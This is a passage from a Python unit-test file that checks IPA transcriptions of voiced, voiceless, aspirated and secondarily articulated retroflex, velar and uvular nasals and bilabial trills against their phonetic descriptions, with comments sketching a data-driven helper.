expected = "voiced velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex nasal pulmonic egressive consonant
def test_ɳˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex nasal pulmonic egressive consonant
def test_ɳʰ_is_the_representation_of_the_voiced_aspirated_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex nasal pulmonic egressive consonant
def test_ɳʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰʷ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex nasal pulmonic egressive consonant
def test_ɳʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰʲ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex nasal pulmonic egressive consonant
def test_ɳʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰˠ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex nasal pulmonic egressive consonant
def test_ɳʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳʰˤ")
self.assertEqual(actual, expected)
def test_ɳ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex nasal pulmonic egressive consonant"
actual = describe_transcription("ɳ̬ʰˤ")
self.assertEqual(actual, expected)
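# The cartesian layout of this section (voicing x aspiration x secondary
# articulation x place) suggests the methods are generated. A hedged sketch
# of the enumeration behind one nasal block (names are illustrative):
#
#     SECONDARY = {"": "", "ʷ": "labialized ", "ʲ": "palatalized ",
#                  "ˠ": "velarized ", "ˤ": "pharyngealized "}
#     for mark, label in SECONDARY.items():
#         desc = f"voiced {label}retroflex nasal pulmonic egressive consonant"
#         assert describe_transcription("ɳ" + mark) == desc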
# voiceless velar nasal pulmonic egressive consonant
def test_ŋ̊_is_the_representation_of_the_voiceless_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊")
self.assertEqual(actual, expected)
def test_ŋ̥_is_the_representation_of_the_voiceless_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥")
self.assertEqual(actual, expected)
# voiceless labialized velar nasal pulmonic egressive consonant
def test_ŋ̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʷ")
self.assertEqual(actual, expected)
def test_ŋ̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized velar nasal pulmonic egressive consonant
def test_ŋ̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʲ")
self.assertEqual(actual, expected)
def test_ŋ̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized velar nasal pulmonic egressive consonant
def test_ŋ̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ˠ")
self.assertEqual(actual, expected)
def test_ŋ̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized velar nasal pulmonic egressive consonant
def test_ŋ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ˤ")
self.assertEqual(actual, expected)
def test_ŋ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated velar nasal pulmonic egressive consonant
def test_ŋ̥ʰ_is_the_representation_of_the_voiceless_aspirated_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰ_is_the_representation_of_the_voiceless_aspirated_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized velar nasal pulmonic egressive consonant
def test_ŋ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized velar nasal pulmonic egressive consonant
def test_ŋ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized velar nasal pulmonic egressive consonant
def test_ŋ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized velar nasal pulmonic egressive consonant
def test_ŋ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ŋ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced velar nasal pulmonic egressive consonant
def test_ŋ_is_the_representation_of_the_voiced_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ")
self.assertEqual(actual, expected)
# voiced labialized velar nasal pulmonic egressive consonant
def test_ŋʷ_is_the_representation_of_the_voiced_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʷ")
self.assertEqual(actual, expected)
# voiced palatalized velar nasal pulmonic egressive consonant
def test_ŋʲ_is_the_representation_of_the_voiced_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʲ")
self.assertEqual(actual, expected)
# voiced velarized velar nasal pulmonic egressive consonant
def test_ŋˠ_is_the_representation_of_the_voiced_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized velar nasal pulmonic egressive consonant
def test_ŋˤ_is_the_representation_of_the_voiced_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋˤ")
self.assertEqual(actual, expected)
# voiced aspirated velar nasal pulmonic egressive consonant
def test_ŋʰ_is_the_representation_of_the_voiced_aspirated_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized velar nasal pulmonic egressive consonant
def test_ŋʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰʷ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized velar nasal pulmonic egressive consonant
def test_ŋʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰʲ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized velar nasal pulmonic egressive consonant
def test_ŋʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰˠ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized velar nasal pulmonic egressive consonant
def test_ŋʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋʰˤ")
self.assertEqual(actual, expected)
def test_ŋ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar nasal pulmonic egressive consonant"
actual = describe_transcription("ŋ̬ʰˤ")
self.assertEqual(actual, expected)
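# The methods above all instantiate one pattern: every transcription in a
# group maps to the same description, with voiceless phones spelled two
# ways (ring above vs. ring below) and voiced aspirated phones spelled two
# ways (bare symbol vs. caron below). As a sketch only, not part of the
# generated suite, the pattern could be expressed data-driven with a
# hypothetical helper (assert_all_described is an assumed name; it relies
# only on the describe_transcription function this suite already imports):
def assert_all_described(self, transcriptions, expected):
    # Check every spelling of a phone against one shared description,
    # reporting each transcription separately via subTest on failure.
    for transcription in transcriptions:
        with self.subTest(transcription=transcription):
            self.assertEqual(describe_transcription(transcription), expected)
# For example, the two voiceless palatalized velar nasal cases above would
# collapse into a single call:
#     self.assert_all_described(
#         ["ŋ̊ʲ", "ŋ̥ʲ"],
#         "voiceless palatalized velar nasal pulmonic egressive consonant")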
# voiceless uvular nasal pulmonic egressive consonant
def test_ɴ̊_is_the_representation_of_the_voiceless_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊")
self.assertEqual(actual, expected)
def test_ɴ̥_is_the_representation_of_the_voiceless_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥")
self.assertEqual(actual, expected)
# voiceless labialized uvular nasal pulmonic egressive consonant
def test_ɴ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʷ")
self.assertEqual(actual, expected)
def test_ɴ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized uvular nasal pulmonic egressive consonant
def test_ɴ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʲ")
self.assertEqual(actual, expected)
def test_ɴ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized uvular nasal pulmonic egressive consonant
def test_ɴ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ˠ")
self.assertEqual(actual, expected)
def test_ɴ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized uvular nasal pulmonic egressive consonant
def test_ɴ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ˤ")
self.assertEqual(actual, expected)
def test_ɴ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized uvular nasal pulmonic egressive consonant
def test_ɴ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɴ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced uvular nasal pulmonic egressive consonant
def test_ɴ_is_the_representation_of_the_voiced_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ")
self.assertEqual(actual, expected)
# voiced labialized uvular nasal pulmonic egressive consonant
def test_ɴʷ_is_the_representation_of_the_voiced_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʷ")
self.assertEqual(actual, expected)
# voiced palatalized uvular nasal pulmonic egressive consonant
def test_ɴʲ_is_the_representation_of_the_voiced_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʲ")
self.assertEqual(actual, expected)
# voiced velarized uvular nasal pulmonic egressive consonant
def test_ɴˠ_is_the_representation_of_the_voiced_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized uvular nasal pulmonic egressive consonant
def test_ɴˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴˤ")
self.assertEqual(actual, expected)
# voiced aspirated uvular nasal pulmonic egressive consonant
def test_ɴʰ_is_the_representation_of_the_voiced_aspirated_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized uvular nasal pulmonic egressive consonant
def test_ɴʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰʷ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized uvular nasal pulmonic egressive consonant
def test_ɴʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰʲ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized uvular nasal pulmonic egressive consonant
def test_ɴʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰˠ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized uvular nasal pulmonic egressive consonant
def test_ɴʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴʰˤ")
self.assertEqual(actual, expected)
def test_ɴ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular nasal pulmonic egressive consonant"
actual = describe_transcription("ɴ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless bilabial trill pulmonic egressive consonant
def test_ʙ̊_is_the_representation_of_the_voiceless_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊")
self.assertEqual(actual, expected)
def test_ʙ̥_is_the_representation_of_the_voiceless_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥")
self.assertEqual(actual, expected)
# voiceless labialized bilabial trill pulmonic egressive consonant
def test_ʙ̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʷ")
self.assertEqual(actual, expected)
def test_ʙ̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized bilabial trill pulmonic egressive consonant
def test_ʙ̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʲ")
self.assertEqual(actual, expected)
def test_ʙ̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized bilabial trill pulmonic egressive consonant
def test_ʙ̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ˠ")
self.assertEqual(actual, expected)
def test_ʙ̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized bilabial trill pulmonic egressive consonant
def test_ʙ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ˤ")
self.assertEqual(actual, expected)
def test_ʙ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰˠ")
self.assertEqual(actual, expected)
